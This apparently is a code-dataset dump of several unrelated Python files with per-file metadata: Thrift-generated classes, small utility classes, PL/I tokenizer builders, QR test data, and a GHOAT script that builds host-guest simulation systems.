if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Instances')
if self.instances is not None:
oprot.writeFieldBegin('instances', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.instances))
for iter38 in self.instances:
iter38.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.provider_hash is not None:
oprot.writeFieldBegin('provider_hash', TType.STRING, 2)
oprot.writeString(self.provider_hash.encode('utf-8'))
oprot.writeFieldEnd()
if self.identity_hash is not None:
oprot.writeFieldBegin('identity_hash', TType.STRING, 3)
oprot.writeString(self.identity_hash.encode('utf-8'))
oprot.writeFieldEnd()
if self.time is not None:
oprot.writeFieldBegin('time', TType.I32, 4)
oprot.writeI32(self.time)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.instances is None:
raise TProtocol.TProtocolException(message='Required field instances is unset!')
if self.provider_hash is None:
raise TProtocol.TProtocolException(message='Required field provider_hash is unset!')
if self.time is None:
raise TProtocol.TProtocolException(message='Required field time is unset!')
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.instances)
value = (value * 31) ^ hash(self.provider_hash)
value = (value * 31) ^ hash(self.identity_hash)
value = (value * 31) ^ hash(self.time)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class OpenStackException(TException):
"""
Attributes:
- message
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'message', None, None, ), # 1
)
def __init__(self, message=None,):
self.message = message
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('OpenStackException')
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 1)
oprot.writeString(self.message.encode('utf-8'))
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.message is None:
raise TProtocol.TProtocolException(message='Required field message is unset!')
return
def __str__(self):
return repr(self)
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.message)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ConnectionException(TException):
"""
Attributes:
- message
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'message', None, None, ), # 1
)
def __init__(self, message=None,):
self.message = message
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ConnectionException')
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 1)
oprot.writeString(self.message.encode('utf-8'))
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.message is None:
raise TProtocol.TProtocolException(message='Required field message is unset!')
return
def __str__(self):
return repr(self)
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.message)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class DeployException(TException):
"""
Attributes:
- message
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'message', None, None, ), # 1
)
def __init__(self, message=None,):
self.message = message
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('DeployException')
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 1)
oprot.writeString(self.message.encode('utf-8'))
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.message is None:
raise TProtocol.TProtocolException(message='Required field message is unset!')
return
def __str__(self):
return repr(self)
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.message)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 33.253676
| 190
| 0.640354
| 3,278
| 27,135
| 5.114704
| 0.055522
| 0.043302
| 0.029524
| 0.036502
| 0.877967
| 0.852261
| 0.818144
| 0.808899
| 0.801086
| 0.791304
| 0
| 0.017588
| 0.233094
| 27,135
| 815
| 191
| 33.294479
| 0.788083
| 0.022591
| 0
| 0.807692
| 1
| 0
| 0.048425
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.087278
| false
| 0
| 0.005917
| 0.025148
| 0.190828
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
92cb7eb567923b4d773c0710fe191f961ac23666
| 290
|
py
|
Python
|
Model/MessageTask.py
|
anubizra/chat-inator
|
df021f0d374a25213358d7408c39813526e99e6c
|
[
"MIT"
] | null | null | null |
Model/MessageTask.py
|
anubizra/chat-inator
|
df021f0d374a25213358d7408c39813526e99e6c
|
[
"MIT"
] | null | null | null |
Model/MessageTask.py
|
anubizra/chat-inator
|
df021f0d374a25213358d7408c39813526e99e6c
|
[
"MIT"
] | null | null | null |
class MessageTask(object):
def __init__(self, message_channel, user_name, message):
self.message_channel = message_channel
self.user_name = user_name
self.message = message
def get_message(self):
return '{}:{}'.format(self.user_name, self.message)
| 29
| 60
| 0.675862
| 35
| 290
| 5.257143
| 0.371429
| 0.23913
| 0.195652
| 0.206522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.217241
| 290
| 9
| 61
| 32.222222
| 0.810573
| 0
| 0
| 0
| 0
| 0
| 0.017241
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.142857
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
92e3b7a1e3602eeca965b3df415b1e527ba41e7f
| 182
|
py
|
Python
|
index.py
|
OmniPro-Group/aws-cfn-ses-domain
|
3385864e800749abbd9fc4bf4aa2d6735087bd67
|
[
"Apache-2.0"
] | 35
|
2019-12-11T02:49:27.000Z
|
2022-03-31T07:56:00.000Z
|
index.py
|
OmniPro-Group/aws-cfn-ses-domain
|
3385864e800749abbd9fc4bf4aa2d6735087bd67
|
[
"Apache-2.0"
] | 10
|
2019-08-28T21:42:40.000Z
|
2022-01-07T00:15:40.000Z
|
index.py
|
OmniPro-Group/aws-cfn-ses-domain
|
3385864e800749abbd9fc4bf4aa2d6735087bd67
|
[
"Apache-2.0"
] | 15
|
2019-08-16T22:28:52.000Z
|
2022-03-24T10:15:14.000Z
|
from aws_cfn_ses_domain import handle_domain_identity_request, handle_email_identity_request
__all__ = [
'handle_domain_identity_request',
'handle_email_identity_request',
]
| 30.333333
| 92
| 0.840659
| 23
| 182
| 5.826087
| 0.478261
| 0.447761
| 0.298507
| 0.402985
| 0.791045
| 0.791045
| 0.791045
| 0.791045
| 0
| 0
| 0
| 0
| 0.104396
| 182
| 5
| 93
| 36.4
| 0.822086
| 0
| 0
| 0
| 0
| 0
| 0.324176
| 0.324176
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
13314e16cb16e274106118eff89b8dbcfa9f83cb
| 244
|
py
|
Python
|
attributes/models/__init__.py
|
pmaigutyak/mp-shop
|
14ea67f71fd91a282d2070414924708214fc6464
|
[
"0BSD"
] | 2
|
2018-03-14T11:32:36.000Z
|
2021-09-25T14:31:36.000Z
|
attributes/models/__init__.py
|
pmaigutyak/mp-shop
|
14ea67f71fd91a282d2070414924708214fc6464
|
[
"0BSD"
] | null | null | null |
attributes/models/__init__.py
|
pmaigutyak/mp-shop
|
14ea67f71fd91a282d2070414924708214fc6464
|
[
"0BSD"
] | null | null | null |
from attributes.models.attribute import Attribute
from attributes.models.attribute_option import AttributeOption
from attributes.models.attribute_value import AttributeValue, VALUE_FIELDS
from attributes.models.service import AttributeService
| 40.666667
| 74
| 0.889344
| 28
| 244
| 7.642857
| 0.428571
| 0.261682
| 0.373832
| 0.406542
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07377
| 244
| 5
| 75
| 48.8
| 0.946903
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
137241ee23f65803961b1c807dd7cc52187a3efc
| 2,470
|
py
|
Python
|
pl1_token_builders.py
|
jfitz/code-stat
|
dd2a13177f3ef03ab42123ef3cfcbbd062a2ae26
|
[
"MIT"
] | null | null | null |
pl1_token_builders.py
|
jfitz/code-stat
|
dd2a13177f3ef03ab42123ef3cfcbbd062a2ae26
|
[
"MIT"
] | null | null | null |
pl1_token_builders.py
|
jfitz/code-stat
|
dd2a13177f3ef03ab42123ef3cfcbbd062a2ae26
|
[
"MIT"
] | null | null | null |
from codestat_token import Token
from token_builders import TokenBuilder
# token reader for label
class PL1LabelTokenBuilder(TokenBuilder):
@staticmethod
def __escape_z__():
Token.__escape_z__()
return 'Escape ?Z'
def __init__(self):
self.text = None
def get_tokens(self):
if self.text is None:
return None
return [Token(self.text, 'label', False)]
def accept(self, candidate, c):
if len(candidate) > 1 and candidate[-1] == ':':
return False
if len(candidate) > 1:
return c.isalpha() or c.isdigit() or c == ':'
return c.isalpha()
# token reader for start comment
class PL1CommentStartTokenBuilder(TokenBuilder):
@staticmethod
def __escape_z__():
Token.__escape_z__()
return 'Escape ?Z'
def __init__(self):
self.text = ''
def get_tokens(self):
if self.text is None:
return None
return [Token(self.text, 'comment-start', False)]
def accept(self, candidate, c):
if len(candidate) == 0:
return c == '/'
if len(candidate) == 1:
return c == '*'
return not candidate.endswith('*/')
def get_score(self, line_printable_tokens):
if self.text is None:
return 0
if self.text.startswith('/*') and not self.text.endswith('*/'):
return len(self.text)
return 0
# token reader for middle comment
class PL1CommentMiddleTokenBuilder(TokenBuilder):
@staticmethod
def __escape_z__():
Token.__escape_z__()
return 'Escape ?Z'
def __init__(self):
self.text = ''
def get_tokens(self):
if self.text is None:
return None
return [Token(self.text, 'comment-middle', False)]
def accept(self, candidate, c):
return not candidate.endswith('*/')
def get_score(self, line_printable_tokens):
if self.text is None:
return 0
if not self.text.endswith('*/'):
return len(self.text)
return 0
# token reader for end comment
class PL1CommentEndTokenBuilder(TokenBuilder):
@staticmethod
def __escape_z__():
Token.__escape_z__()
return 'Escape ?Z'
def __init__(self):
self.text = ''
def get_tokens(self):
if self.text is None:
return None
return [Token(self.text, 'comment-end', False)]
def accept(self, candidate, c):
return not candidate.endswith('*/')
def get_score(self, line_printable_tokens):
if self.text is None:
return 0
if self.text.endswith('*/'):
return len(self.text)
return 0
| 18.854962
| 67
| 0.648988
| 319
| 2,470
| 4.802508
| 0.15047
| 0.114883
| 0.058747
| 0.05483
| 0.770235
| 0.76893
| 0.740862
| 0.740862
| 0.740862
| 0.665144
| 0
| 0.007907
| 0.231984
| 2,470
| 130
| 68
| 19
| 0.799684
| 0.046154
| 0
| 0.7125
| 0
| 0
| 0.041259
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2375
| false
| 0
| 0.025
| 0.025
| 0.675
| 0.0375
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
13b3580b216367d94ebd4e485b997853f46a713f
| 3,913
|
py
|
Python
|
testing/lastrun.py
|
petrkr/mpy-qr
|
eef6e4d89384a6ec2b09336b8bf7812040934056
|
[
"MIT"
] | 3
|
2020-06-08T20:36:41.000Z
|
2021-12-31T20:09:03.000Z
|
testing/lastrun.py
|
petrkr/mpy-qr
|
eef6e4d89384a6ec2b09336b8bf7812040934056
|
[
"MIT"
] | 4
|
2020-09-10T22:11:12.000Z
|
2022-02-19T18:06:32.000Z
|
testing/lastrun.py
|
petrkr/mpy-qr
|
eef6e4d89384a6ec2b09336b8bf7812040934056
|
[
"MIT"
] | 2
|
2021-12-28T16:25:15.000Z
|
2021-12-31T20:09:07.000Z
|
lowercase = {'val': 'abcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabc', 'packed': (48, 45, 3, b'\xfe:\x14F\x8b\xf8\x82\xf1\xb9\xb0\x12\x08\xba\x0fa\x9a\xd2\xe8\xba\xf5\xee\xc1\x1a\xe8\xbaj\x1f\xcf:\xe8\x82\xd9\xa8\xb0B\x08\xfe\xaa\xaa\xaa\xab\xf8\x00\x07x\x9a\xc8\x00\xfb\xdd\xff\xa5\x05P@b\x04O\x1d\xa8\xf6x/\xb0sP`\x1d\x11\x1a\xc9\xf8\xbe\xe5\xee\xa5\x02\x00\x98\x82\x04_\x9c(\xd2(/\xb0cpy\x05\x11\x1a\xc9\xe8f5\xee\xe7f\x00\xc0\xc2\x04_\x9c(\x1bX\xab\xb0cp\x81cP\x1a\xc9\xe8\x1f\xdd\xff\xe7o\x80\xe8\x9a\x08\xc6\x98\xa8\xda\xd8\xaa\xb0z\x90(\xb3H\x9a\xc8\xf0\xef\xbd\xef\xc1?\x80T\xca\x1e\xc6\x8e(\xb7\x99\xac0l\x90\xb5\x0fc\x9a\xd3pO%\xe0A!\x80\xc8\xda\x1e\xcf\x0c(\x8e\x99\xac0l\xd0\xe1\x0fq\x9a\xd3x\x96\xa9\xe1\xa5\x01\x80y\x10\x1e\xcf\x1c(\n@,0m\xd0yu\x11\x9a\xd3h\x9be\xef\xa5\x0f\x90\x00\xda\x08\xdf\x98\xa8\xfe\xb6:\xb0z\xf0\x82\x0b\x18\x9a\xc8\xe8\xba\x9f\xef\xe7o\x80\xba\xc8\t\xdf\x81\xb0\xba\xf8\xa6\xb0zh\x82\xcbL\x1a\xc5\xe0\xfe\xa5\xf7\xe7k\x10\x00\x00\x00\xff\xbc\xec\xfe\x7f\x00\x00O\xe2\t\x03\x01\x00\x00\x00')}
uppercase = {'val': 'ABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABC', 'packed': (40, 37, 3, b'\xfe\xba3\x03\xf8\x82m\x9bR\x08\xba(<\xba\xe8\xba\x0c\xc12\xe8\xbaS\x85R\xe8\x82/\x90:\x08\xfe\xaa\xaa\xab\xf8\x00\xb2\xf5 \x00\xdaq\x8d\xea\x08\xe5\x92j\x9b\x80\xcb\xdf\x92\x0b\xe8@0m\x8f\xb0\x9eh\x80\xc1\xc0\xf8\xa6\xe4\xb2H\xf3\x08e\xf6P\xe4D\xaf\xbc J\x14\xb2I\xa0]rc\xf5\xc0b\xc8\x08\x00\x08l\x87\xbd\xa2H\xdb\xb2\xe2uP\xa9\x08\xdb\xf8h\xaaf\x90[\xa852\xc2\x0c\xb8\xbbd\x80\x15\x88\x944(\xa9X\xdf|\xda\x13\xb0\x80\xe9\x9d\xb8(\xa7\xa6\xb3\x7f\x80\x00\xba\xd9\x98\xa8\xfeNA\n\x98\x82i\x18x\x90\xba\xdb8\x1f\xa0\xba\xfd\x99\xc7\xc8\xbaF\xa1D(\x82\x9b@7\x90\xfe\xe2u\x81\x98-\xc0\x05\xdd\x7f\x00\x00\x00\xff\xbc\xec\xfe\x7f\x00\x00')}
byte_upper = {'val': 'ABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABC', 'packed': (48, 45, 3, b'\xfe\xa84\xc6\x8b\xf8\x82\x1a\xd4$\xd2\x08\xba\x9a\xd7I\x12\xe8\xba\x85d\xc1\x1a\xe8\xba\xf3_\xf9\xba\xe8\x82d\x18\xc9\x02\x08\xfe\xaa\xaa\xaa\xab\xf8\x00\x14\x18\xa4\x90\x00\xf2\x88\xcf\xfed\xe8aH$\xcf\x1d\xa0\xe2\x83J$\x8a8\xac\xa8\xa7\xc9$\xc8\xff\xb5l\xa5\n \xc8kIiGH\xb6\xdd\x91I,\xc0\xf9u\x11\x12Ihg\xd6\x01Q\xb5HP\x1d\x92\x04\xf1\x90\x1eh\xa3\x92Ap,\xd0=\xa4\x92\x00_\x98\xcf\xbc\x0f\x90\xa8\xe0(\xc6\x88\xa0z\x93\xca\xa4\x8a\xf8\x98\x96\xf8\xc9(\xc0\x7f\xfdo\xc1?\xa0QSApUH?t\x1aI! \x05\x8fc\x92Ap\x0f\xb6\r\xf7\xfaH\x1c5\x9a\x14a\x90\x8a\xb9\xac\x92L\xd0\x15\xb4\x1c$\x9a\x10;D\xd7~l\x90\x99\x10,\xcf\x1c \n{A$\x96\xb8y\x18\xa7I,\xd8\x9b\ro\xa5\x0f\xb0\x00\xa3H\xe9H\xc8\xfe{\x9a\xc9:\xc0\x82k\x18\x92H\xe8\xbaD\x0f\xd1\xbf\xc8\xba\x85\x9f\x04\xe4\x80\xba\xb8\xa4\x92Zh\x82\xd0)$\x9e\x88\xfe\xc0\xc1<\x04\x80\x00\x00\x00\xff\xbc\xec\xfe\x7f\x00\x00O\xe2\t\x03\x01\x00\x00\x00')}
numeric = {'val': '123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123', 'packed': (40, 33, 7, b'\xfeJ\xaa\xbf\x80\x82=U \x80\xba\xea\xaa\xae\x80\xbauQ.\x80\xba"\xac\xae\x80\x82DU \x80\xfe\xaa\xaa\xbf\x80\x00\xe9S\x00\x00\xef\xb2\xa8\xe2\x00`5UJ\x00\xbf\xc2\xaa\xe0\x80\x10\x11U*\x80\n\n\xaa\x9a\x00Q\x9cU0\x80\xd2\xfa\xaa5\x80\x05\xadT\x1f\x00?\xd2\xabU\x00\xf0\xb1T\xe5\x80\xa3d\xaa\xcf\x00\xe9QU\xca\x00\xcb\xa8\xeb\xe0\x80]\xdd\\\xaa\x80\xa2z\x97\x1a\x00u/M0\x80\xa6\x92\x96\xfd\x80\x00\xd3R\x8f\x00\xfe\x845\xac\x00\x82\xf1K\x8c\x00\xba\xc8\x97\xff\x80\xba]@\xcb\x80\xba\xfa\xa5\xe0\x80\x82\x8fG*\x00\xfe\xb2\xb7\x1a\x80\x7f\x00\x00\x96\x00\x00\x00\x00\x00\x00\x00B\x00\x00\x00!\x00\x00\x00 1\xc0\x05\xdd\x7f\x00\x00\x00\xff\xbc\xec\xfe\x7f\x00\x00')}
| 782.6
| 1,134
| 0.768209
| 764
| 3,913
| 3.92801
| 0.356021
| 0.051983
| 0.041986
| 0.023992
| 0.206265
| 0.201266
| 0.18927
| 0.18927
| 0.061313
| 0.061313
| 0
| 0.251745
| 0.011245
| 3,913
| 4
| 1,135
| 978.25
| 0.523908
| 0
| 0
| 0
| 0
| 1
| 0.9563
| 0.945055
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b911fde6463632343607243bc23a5e5cda551817
| 50,009
|
py
|
Python
|
GHOAT/lib/build.py
|
GHeinzelmann/GHOAT.py
|
77f20073288cbad57a987d990e1a49eb4873ca99
|
[
"MIT"
] | 2
|
2021-03-17T14:08:32.000Z
|
2021-08-31T11:49:16.000Z
|
GHOAT/lib/build.py
|
GHeinzelmann/GHOAT.py
|
77f20073288cbad57a987d990e1a49eb4873ca99
|
[
"MIT"
] | 2
|
2021-03-18T17:01:34.000Z
|
2021-04-29T01:16:39.000Z
|
GHOAT/lib/build.py
|
GHeinzelmann/GHOAT.py
|
77f20073288cbad57a987d990e1a49eb4873ca99
|
[
"MIT"
] | 4
|
2021-05-30T08:28:02.000Z
|
2022-03-26T11:45:08.000Z
|
#!/usr/bin/env python3
import datetime as dt
import glob as glob
import os as os
import re as re
import shutil as shutil
import signal as signal
import subprocess as sp
import sys as sys
from lib import scripts
def build_equil(guest, host, mol, H1, H2, H3, min_adis, max_adis, l1_range, amber_ff, final_host_num, guest_charge, sdr_dist):
# Create equilibrium directory
if not os.path.exists('equil'):
os.makedirs('equil')
os.chdir('equil')
if os.path.exists('./build_files'):
shutil.rmtree('./build_files')
try:
shutil.copytree('../build_files', './build_files')
# Directories are the same
except shutil.Error as e:
print('Directory not copied. Error: %s' % e)
# Any error saying that the directory doesn't exist
except OSError as e:
print('Directory not copied. Error: %s' % e)
os.chdir('build_files')
# Copy structure and separate guest and host
shutil.copy('../../structures/%s-%s.pdb' %(host.lower(), guest.lower()), './')
with open("separate-ini.tcl", "rt") as fin:
with open("separate.tcl", "wt") as fout:
for line in fin:
fout.write(line.replace('MMM', mol).replace('hhhh', host.lower()).replace('gggg', guest.lower()).replace('FIRST','1').replace('LAST', str(final_host_num)))
sp.call('vmd -dispdev text -e separate.tcl', shell=True)
h1_resid = H1.split('@')[0][1:]
h2_resid = H2.split('@')[0][1:]
h3_resid = H3.split('@')[0][1:]
h1_atom = H1.split('@')[1]
h2_atom = H2.split('@')[1]
h3_atom = H3.split('@')[1]
print('Receptor anchors:')
print(H1)
print(H2)
print(H3)
# Replace names in initial files and VMD scripts
with open("prep-ini.tcl", "rt") as fin:
with open("prep.tcl", "wt") as fout:
for line in fin:
fout.write(line.replace('hhhh', host.lower()).replace('gggg', guest.lower()).replace('MMM', mol).replace('NN1', h1_atom).replace('H1A', h1_resid).replace('NN2', h2_atom).replace('H2A', h2_resid).replace('NN3', h3_atom).replace('H3A', h3_resid).replace('FIRST','1').replace('LAST', str(final_host_num)).replace('STAGE','equil').replace('DMAX','%4.2f' %max_adis).replace('DMIN','%4.2f' %min_adis).replace('RANG','%4.2f' %l1_range).replace('SDRD', str(sdr_dist)))
# Get parameters for host
shutil.copy('../../parameters/%s.mol2' %(host.lower()), './') # AM1-BCC charges problematic for cyclic hosts, using provided charges only
if not os.path.exists('../../parameters/%s.frcmod' %host.lower()):
if amber_ff == 'gaff':
sp.call('parmchk2 -i '+host.lower()+'.mol2 -f mol2 -o '+host.lower()+'.frcmod -s 1', shell=True)
elif amber_ff == 'gaff2':
sp.call('parmchk2 -i '+host.lower()+'.mol2 -f mol2 -o '+host.lower()+'.frcmod -s 2', shell=True)
else:
shutil.copy('../../parameters/%s.frcmod' %(host.lower()), './')
# Get parameters for guest
if not os.path.exists('../../parameters/%s.mol2' %guest.lower()):
print('Antechamber parameters command: antechamber -i '+guest.lower()+'.pdb -fi pdb -o '+guest.lower()+'.mol2 -fo mol2 -c bcc -s 2 -at '+amber_ff.lower()+' -nc %s' % guest_charge)
sp.call('antechamber -i '+guest.lower()+'.pdb -fi pdb -o '+guest.lower()+'.mol2 -fo mol2 -c bcc -s 2 -at '+amber_ff.lower()+' -nc %s' % guest_charge, shell=True)
else:
shutil.copy('../../parameters/%s.mol2' %(guest.lower()), './') # Provided charges for guest
if not os.path.exists('../../parameters/%s.frcmod' %guest.lower()):
if amber_ff == 'gaff':
sp.call('parmchk2 -i '+guest.lower()+'.mol2 -f mol2 -o '+guest.lower()+'.frcmod -s 1', shell=True)
elif amber_ff == 'gaff2':
sp.call('parmchk2 -i '+guest.lower()+'.mol2 -f mol2 -o '+guest.lower()+'.frcmod -s 2', shell=True)
else:
shutil.copy('../../parameters/%s.frcmod' %(guest.lower()), './')
# Put complex in AMBER format and find ligand anchor atoms
sp.call('vmd -dispdev text -e prep.tcl', shell=True)
# Save parameters in ff folder
if not os.path.exists('../ff/'):
os.makedirs('../ff/')
shutil.copy('./%s.mol2' %(host.lower()), '../ff/')
shutil.copy('./%s.frcmod' %(host.lower()), '../ff/')
shutil.copy('./%s.mol2' %(guest.lower()), '../ff/')
shutil.copy('./%s.frcmod' %(guest.lower()), '../ff/')
# Check size of anchor file
anchor_file = 'anchors.txt'
if os.stat(anchor_file).st_size == 0:
os.chdir('../')
return 'anch1'
f = open(anchor_file, 'r')
for line in f:
splitdata = line.split()
if len(splitdata) < 3:
os.rename('./anchors.txt', 'anchors-'+guest.lower()+'.txt')
os.chdir('../')
return 'anch2'
os.rename('./anchors.txt', 'anchors-'+guest.lower()+'.txt')
os.chdir('../')
# Create simulation directory
if not os.path.exists(guest):
os.makedirs(guest)
os.chdir(guest)
shutil.copy('../build_files/%s-%s-aligned.pdb' %(host.lower(), guest.lower()), './build-ini.pdb')
shutil.copy('../build_files/%s.pdb' %(guest.lower()), './')
shutil.copy('../build_files/%s.pdb' %(host.lower()), './')
shutil.copy('../build_files/anchors-%s.txt' %(guest.lower()), './')
shutil.copy('../build_files/dum1.pdb', './')
shutil.copy('../build_files/dum.mol2', './')
shutil.copy('../build_files/dum.frcmod', './')
dum_coords = []
recep_coords = []
lig_coords = []
dum_atomlist = []
lig_atomlist = []
recep_atomlist = []
dum_atom = 0
lig_atom = 0
recep_atom = 0
total_atom = 0
resid_lig = 0
resname_lig = mol
resname_list = []
resid_list = []
# Read coordinates for dummy atoms
for i in range(1, 2):
shutil.copy('../build_files/dum'+str(i)+'.pdb', './')
with open('dum'+str(i)+'.pdb') as dum_in:
lines = (line.rstrip() for line in dum_in)
lines = list(line for line in lines if line)
dum_coords.append((float(lines[1][30:38].strip()), float(lines[1][38:46].strip()), float(lines[1][46:54].strip())))
dum_atomlist.append(lines[1][12:16].strip())
resname_list.append(lines[1][17:20].strip())
resid_list.append(float(lines[1][22:26].strip()))
dum_atom += 1
total_atom += 1
# Read coordinates from aligned system
with open('build-ini.pdb') as f_in:
lines = (line.rstrip() for line in f_in)
